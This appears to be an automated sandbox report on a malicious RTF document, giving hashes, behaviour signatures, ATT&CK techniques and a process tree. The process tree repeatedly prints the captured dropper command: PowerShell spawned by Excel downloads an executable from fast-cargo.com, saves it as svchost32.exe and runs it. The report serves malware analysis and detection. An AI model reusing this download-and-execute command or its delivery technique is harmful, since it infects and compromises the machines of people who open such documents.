70ebcc2aa157230051490f5480d49dcef22ad8c26be1307ad8eab63bd4233c40

Analysis

max time kernel
125s
max time network
121s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
21/09/2024, 01:59

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

eedc2afd6e99aa74cb24b9afe046dc68_JaffaCakes118.rtf
Size

675KB
MD5

eedc2afd6e99aa74cb24b9afe046dc68
SHA1

ee028e27c4f1282b2f061e96ae62dddfdd5fb95d
SHA256

70ebcc2aa157230051490f5480d49dcef22ad8c26be1307ad8eab63bd4233c40
SHA512

aa176a42dff8ae0612dd57f681a56d2842c9f14a81efdc59bca854f53b8ced58d3048938a71a909bdb2ad378b9766f89c0ba454dc35ae20e65ce0b7864fdee61
SSDEEP

6144:9YZ/EO/1IDPWCh0FzlAifCjE720Sli19W0L/dU3x1JCUIB8emF:uZV/1a+W9fd+9vLFxUJeu

Score

10^/10

discovery execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://fast-cargo.com/images/file/58.exe

Signatures

Process spawned unexpected child process 10 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process	2328	1540	powershell.exe	31
Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process	1636	2780	powershell.exe	34
Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process	1872	1972	powershell.exe	38
Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process	1084	688	powershell.exe	41
Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process	612	1448	powershell.exe	44
Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process	2468	2364	powershell.exe	47
Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process	2824	2608	powershell.exe	50
Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process	772	1892	powershell.exe	53
Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process	1476	2444	powershell.exe	56
Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process	560	1664	powershell.exe	59

Blocklisted process makes network request 10 IoCs

flow	pid	Process
5	2328	powershell.exe
7	1636	powershell.exe
9	1872	powershell.exe
11	1084	powershell.exe
13	612	powershell.exe
15	2468	powershell.exe
17	2824	powershell.exe
19	772	powershell.exe
21	1476	powershell.exe
23	560	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 20 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2468	powershell.exe
2824	powershell.exe
1476	powershell.exe
560	powershell.exe
1636	powershell.exe
1872	powershell.exe
1084	powershell.exe
2328	powershell.exe
612	powershell.exe
772	powershell.exe
2824	powershell.exe
772	powershell.exe
1636	powershell.exe
1872	powershell.exe
1084	powershell.exe
1476	powershell.exe
560	powershell.exe
2328	powershell.exe
612	powershell.exe
2468	powershell.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	WINWORD.EXE

System Location Discovery: System Language Discovery 1 TTPs 31 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	excelcnv.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	excelcnv.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	excelcnv.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	excelcnv.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	excelcnv.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WINWORD.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	excelcnv.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	excelcnv.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	excelcnv.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	excelcnv.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	excelcnv.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	EXCEL.EXE

Office loads VBA resources, possible macro or embedded object present

Enumerates system info in registry 2 TTPs 20 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor	excelcnv.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor	excelcnv.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor	excelcnv.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor	excelcnv.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor	excelcnv.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor	excelcnv.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor	excelcnv.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor	excelcnv.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor	excelcnv.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor	excelcnv.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
2688	WINWORD.EXE

Suspicious behavior: EnumeratesProcesses 10 IoCs

pid	Process
2328	powershell.exe
1636	powershell.exe
1872	powershell.exe
1084	powershell.exe
612	powershell.exe
2468	powershell.exe
2824	powershell.exe
772	powershell.exe
1476	powershell.exe
560	powershell.exe

Suspicious use of AdjustPrivilegeToken 10 IoCs

description	pid	Process
Token: SeDebugPrivilege	2328	powershell.exe
Token: SeDebugPrivilege	1636	powershell.exe
Token: SeDebugPrivilege	1872	powershell.exe
Token: SeDebugPrivilege	1084	powershell.exe
Token: SeDebugPrivilege	612	powershell.exe
Token: SeDebugPrivilege	2468	powershell.exe
Token: SeDebugPrivilege	2824	powershell.exe
Token: SeDebugPrivilege	772	powershell.exe
Token: SeDebugPrivilege	1476	powershell.exe
Token: SeDebugPrivilege	560	powershell.exe

Suspicious use of FindShellTrayWindow 2 IoCs

pid	Process
2688	WINWORD.EXE
2688	WINWORD.EXE

Suspicious use of SetWindowsHookEx 42 IoCs

pid	Process
2688	WINWORD.EXE
2688	WINWORD.EXE
1540	EXCEL.EXE
1540	EXCEL.EXE
1540	EXCEL.EXE
1540	EXCEL.EXE
2780	EXCEL.EXE
2780	EXCEL.EXE
2780	EXCEL.EXE
2780	EXCEL.EXE
1972	EXCEL.EXE
1972	EXCEL.EXE
1972	EXCEL.EXE
1972	EXCEL.EXE
688	EXCEL.EXE
688	EXCEL.EXE
688	EXCEL.EXE
688	EXCEL.EXE
1448	EXCEL.EXE
1448	EXCEL.EXE
1448	EXCEL.EXE
1448	EXCEL.EXE
2364	EXCEL.EXE
2364	EXCEL.EXE
2364	EXCEL.EXE
2364	EXCEL.EXE
2608	EXCEL.EXE
2608	EXCEL.EXE
2608	EXCEL.EXE
2608	EXCEL.EXE
1892	EXCEL.EXE
1892	EXCEL.EXE
1892	EXCEL.EXE
1892	EXCEL.EXE
2444	EXCEL.EXE
2444	EXCEL.EXE
2444	EXCEL.EXE
2444	EXCEL.EXE
1664	EXCEL.EXE
1664	EXCEL.EXE
1664	EXCEL.EXE
1664	EXCEL.EXE

Suspicious use of WriteProcessMemory 44 IoCs

description	pid	Process	procid_target
PID 2688 wrote to memory of 2100	2688	WINWORD.EXE	30
PID 2688 wrote to memory of 2100	2688	WINWORD.EXE	30
PID 2688 wrote to memory of 2100	2688	WINWORD.EXE	30
PID 2688 wrote to memory of 2100	2688	WINWORD.EXE	30
PID 1540 wrote to memory of 2328	1540	EXCEL.EXE	32
PID 1540 wrote to memory of 2328	1540	EXCEL.EXE	32
PID 1540 wrote to memory of 2328	1540	EXCEL.EXE	32
PID 1540 wrote to memory of 2328	1540	EXCEL.EXE	32
PID 2780 wrote to memory of 1636	2780	EXCEL.EXE	35
PID 2780 wrote to memory of 1636	2780	EXCEL.EXE	35
PID 2780 wrote to memory of 1636	2780	EXCEL.EXE	35
PID 2780 wrote to memory of 1636	2780	EXCEL.EXE	35
PID 1972 wrote to memory of 1872	1972	EXCEL.EXE	39
PID 1972 wrote to memory of 1872	1972	EXCEL.EXE	39
PID 1972 wrote to memory of 1872	1972	EXCEL.EXE	39
PID 1972 wrote to memory of 1872	1972	EXCEL.EXE	39
PID 688 wrote to memory of 1084	688	EXCEL.EXE	42
PID 688 wrote to memory of 1084	688	EXCEL.EXE	42
PID 688 wrote to memory of 1084	688	EXCEL.EXE	42
PID 688 wrote to memory of 1084	688	EXCEL.EXE	42
PID 1448 wrote to memory of 612	1448	EXCEL.EXE	45
PID 1448 wrote to memory of 612	1448	EXCEL.EXE	45
PID 1448 wrote to memory of 612	1448	EXCEL.EXE	45
PID 1448 wrote to memory of 612	1448	EXCEL.EXE	45
PID 2364 wrote to memory of 2468	2364	EXCEL.EXE	48
PID 2364 wrote to memory of 2468	2364	EXCEL.EXE	48
PID 2364 wrote to memory of 2468	2364	EXCEL.EXE	48
PID 2364 wrote to memory of 2468	2364	EXCEL.EXE	48
PID 2608 wrote to memory of 2824	2608	EXCEL.EXE	51
PID 2608 wrote to memory of 2824	2608	EXCEL.EXE	51
PID 2608 wrote to memory of 2824	2608	EXCEL.EXE	51
PID 2608 wrote to memory of 2824	2608	EXCEL.EXE	51
PID 1892 wrote to memory of 772	1892	EXCEL.EXE	54
PID 1892 wrote to memory of 772	1892	EXCEL.EXE	54
PID 1892 wrote to memory of 772	1892	EXCEL.EXE	54
PID 1892 wrote to memory of 772	1892	EXCEL.EXE	54
PID 2444 wrote to memory of 1476	2444	EXCEL.EXE	57
PID 2444 wrote to memory of 1476	2444	EXCEL.EXE	57
PID 2444 wrote to memory of 1476	2444	EXCEL.EXE	57
PID 2444 wrote to memory of 1476	2444	EXCEL.EXE	57
PID 1664 wrote to memory of 560	1664	EXCEL.EXE	60
PID 1664 wrote to memory of 560	1664	EXCEL.EXE	60
PID 1664 wrote to memory of 560	1664	EXCEL.EXE	60
PID 1664 wrote to memory of 560	1664	EXCEL.EXE	60

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\eedc2afd6e99aa74cb24b9afe046dc68_JaffaCakes118.rtf"
1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2688
- C:\Windows\splwow64.exe
  C:\Windows\splwow64.exe 12288
  2⤵
  PID:2100

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" -Embedding
1⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1540
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" (New-Object System.Net.WebClient).DownloadFile('http://fast-cargo.com/images/file/58.exe','C:\Users\Admin\AppData\Local\Temp\svchost32.exe');Start-Process 'C:\Users\Admin\AppData\Local\Temp\svchost32.exe'
  2⤵
  - Process spawned unexpected child process
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2328

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" -Embedding
1⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2780
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" (New-Object System.Net.WebClient).DownloadFile('http://fast-cargo.com/images/file/58.exe','C:\Users\Admin\AppData\Local\Temp\svchost32.exe');Start-Process 'C:\Users\Admin\AppData\Local\Temp\svchost32.exe'
  2⤵
  - Process spawned unexpected child process
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1636

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" -Embedding
1⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1972
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" (New-Object System.Net.WebClient).DownloadFile('http://fast-cargo.com/images/file/58.exe','C:\Users\Admin\AppData\Local\Temp\svchost32.exe');Start-Process 'C:\Users\Admin\AppData\Local\Temp\svchost32.exe'
  2⤵
  - Process spawned unexpected child process
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1872

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" -Embedding
1⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:688
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" (New-Object System.Net.WebClient).DownloadFile('http://fast-cargo.com/images/file/58.exe','C:\Users\Admin\AppData\Local\Temp\svchost32.exe');Start-Process 'C:\Users\Admin\AppData\Local\Temp\svchost32.exe'
  2⤵
  - Process spawned unexpected child process
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1084

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" -Embedding
1⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1448
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" (New-Object System.Net.WebClient).DownloadFile('http://fast-cargo.com/images/file/58.exe','C:\Users\Admin\AppData\Local\Temp\svchost32.exe');Start-Process 'C:\Users\Admin\AppData\Local\Temp\svchost32.exe'
  2⤵
  - Process spawned unexpected child process
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:612

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" -Embedding
1⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2364
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" (New-Object System.Net.WebClient).DownloadFile('http://fast-cargo.com/images/file/58.exe','C:\Users\Admin\AppData\Local\Temp\svchost32.exe');Start-Process 'C:\Users\Admin\AppData\Local\Temp\svchost32.exe'
  2⤵
  - Process spawned unexpected child process
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2468

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" -Embedding
1⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2608
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" (New-Object System.Net.WebClient).DownloadFile('http://fast-cargo.com/images/file/58.exe','C:\Users\Admin\AppData\Local\Temp\svchost32.exe');Start-Process 'C:\Users\Admin\AppData\Local\Temp\svchost32.exe'
  2⤵
  - Process spawned unexpected child process
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2824

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" -Embedding
1⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1892
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" (New-Object System.Net.WebClient).DownloadFile('http://fast-cargo.com/images/file/58.exe','C:\Users\Admin\AppData\Local\Temp\svchost32.exe');Start-Process 'C:\Users\Admin\AppData\Local\Temp\svchost32.exe'
  2⤵
  - Process spawned unexpected child process
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:772

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" -Embedding
1⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2444
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" (New-Object System.Net.WebClient).DownloadFile('http://fast-cargo.com/images/file/58.exe','C:\Users\Admin\AppData\Local\Temp\svchost32.exe');Start-Process 'C:\Users\Admin\AppData\Local\Temp\svchost32.exe'
  2⤵
  - Process spawned unexpected child process
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1476

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" -Embedding
1⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1664
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" (New-Object System.Net.WebClient).DownloadFile('http://fast-cargo.com/images/file/58.exe','C:\Users\Admin\AppData\Local\Temp\svchost32.exe');Start-Process 'C:\Users\Admin\AppData\Local\Temp\svchost32.exe'
  2⤵
  - Process spawned unexpected child process
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:560

C:\Program Files (x86)\Microsoft Office\Office14\excelcnv.exe
"C:\Program Files (x86)\Microsoft Office\Office14\excelcnv.exe" -Embedding
1⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
PID:692

C:\Program Files (x86)\Microsoft Office\Office14\excelcnv.exe
"C:\Program Files (x86)\Microsoft Office\Office14\excelcnv.exe" -Embedding
1⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
PID:2572

C:\Program Files (x86)\Microsoft Office\Office14\excelcnv.exe
"C:\Program Files (x86)\Microsoft Office\Office14\excelcnv.exe" -Embedding
1⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
PID:1416

C:\Program Files (x86)\Microsoft Office\Office14\excelcnv.exe
"C:\Program Files (x86)\Microsoft Office\Office14\excelcnv.exe" -Embedding
1⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
PID:900

C:\Program Files (x86)\Microsoft Office\Office14\excelcnv.exe
"C:\Program Files (x86)\Microsoft Office\Office14\excelcnv.exe" -Embedding
1⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
PID:2076

C:\Program Files (x86)\Microsoft Office\Office14\excelcnv.exe
"C:\Program Files (x86)\Microsoft Office\Office14\excelcnv.exe" -Embedding
1⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
PID:2840

C:\Program Files (x86)\Microsoft Office\Office14\excelcnv.exe
"C:\Program Files (x86)\Microsoft Office\Office14\excelcnv.exe" -Embedding
1⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
PID:2684

C:\Program Files (x86)\Microsoft Office\Office14\excelcnv.exe
"C:\Program Files (x86)\Microsoft Office\Office14\excelcnv.exe" -Embedding
1⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
PID:2804

C:\Program Files (x86)\Microsoft Office\Office14\excelcnv.exe
"C:\Program Files (x86)\Microsoft Office\Office14\excelcnv.exe" -Embedding
1⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
PID:2620

C:\Program Files (x86)\Microsoft Office\Office14\excelcnv.exe
"C:\Program Files (x86)\Microsoft Office\Office14\excelcnv.exe" -Embedding
1⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
PID:2280

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\svchost32.exe

Filesize
114B

MD5
e89f75f918dbdcee28604d4e09dd71d7

SHA1
f9d9055e9878723a12063b47d4a1a5f58c3eb1e9

SHA256
6dc9c7fc93bb488bb0520a6c780a8d3c0fb5486a4711aca49b4c53fac7393023

SHA512
8df0ab2e3679b64a6174deff4259ae5680f88e3ae307e0ea2dfff88ec4ba14f3477c9fe3a5aa5da3a8e857601170a5108ed75f6d6975958ac7a314e4a336aed0

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

Filesize
19KB

MD5
6cb3504b0eac5834af1f7c2cd9b78812

SHA1
dec24bfd7f8b03e8041e0cdb83b8be17e744d86d

SHA256
e82fb63979fced3c6d61e59aeb5e47349fd97865779553e28d493cbe3f66ae01

SHA512
02019ec89652dd9d8f0fe47bf689490548b68b84d79d765584c62e369255c98b7f1f2e98975b3fea008b18854fba3aad92db9bd3d75aa8cf0d912685849e40d9

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
f7fded24bbb7874e2c2a2d30abf28286

SHA1
ab92ac7a572d746a45e370e64126a4c9211be6ed

SHA256
3c3726c9a249cff6f498926e0184febdfff5d3ac843b1d8f885033a9ada60680

SHA512
2d20883644b59f6fa135ead4c7454024b1f8295562677e22b4b5f153c674118501793c7f3519cec10ff135bb89ab05b1e992235bbef05054da32566032b28792

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
7fd24c6116b4db42d40f38214aa18b62

SHA1
053928fd9937d7b4491bc1e9d8fea376038630c1

SHA256
f30fa45f7d41979b7e8f637213805f3d27c3a9e28994091e2a7e53f8334f2801

SHA512
03c105463e1eef55fbdf1f9d85ceb70b3b546f357f0e5fbd1a85dc3a4da8074ddee01cc0437fd16f74edaeb43caafb3397aa08068829c40e1596641c4d50dc87

Download Submit
memory/1540-10-0x0000000000490000-0x0000000000590000-memory.dmp

Filesize
1024KB

Download
memory/1540-7-0x0000000070C5D000-0x0000000070C68000-memory.dmp

Filesize
44KB

Download
memory/1540-16-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/1540-17-0x0000000070C5D000-0x0000000070C68000-memory.dmp

Filesize
44KB

Download
memory/1540-9-0x0000000000490000-0x0000000000590000-memory.dmp

Filesize
1024KB

Download
memory/1540-8-0x0000000000490000-0x0000000000590000-memory.dmp

Filesize
1024KB

Download
memory/1664-126-0x00000000004D0000-0x00000000005D0000-memory.dmp

Filesize
1024KB

Download
memory/1664-125-0x00000000004D0000-0x00000000005D0000-memory.dmp

Filesize
1024KB

Download
memory/1892-99-0x0000000000540000-0x0000000000640000-memory.dmp

Filesize
1024KB

Download
memory/1892-100-0x0000000000540000-0x0000000000640000-memory.dmp

Filesize
1024KB

Download
memory/1972-34-0x0000000000670000-0x0000000000770000-memory.dmp

Filesize
1024KB

Download
memory/1972-33-0x0000000000670000-0x0000000000770000-memory.dmp

Filesize
1024KB

Download
memory/2444-112-0x00000000004F0000-0x00000000005F0000-memory.dmp

Filesize
1024KB

Download
memory/2444-113-0x00000000004F0000-0x00000000005F0000-memory.dmp

Filesize
1024KB

Download
memory/2608-86-0x00000000004B0000-0x00000000005B0000-memory.dmp

Filesize
1024KB

Download
memory/2608-87-0x00000000004B0000-0x00000000005B0000-memory.dmp

Filesize
1024KB

Download
memory/2688-0-0x000000002F541000-0x000000002F542000-memory.dmp

Filesize
4KB

Download
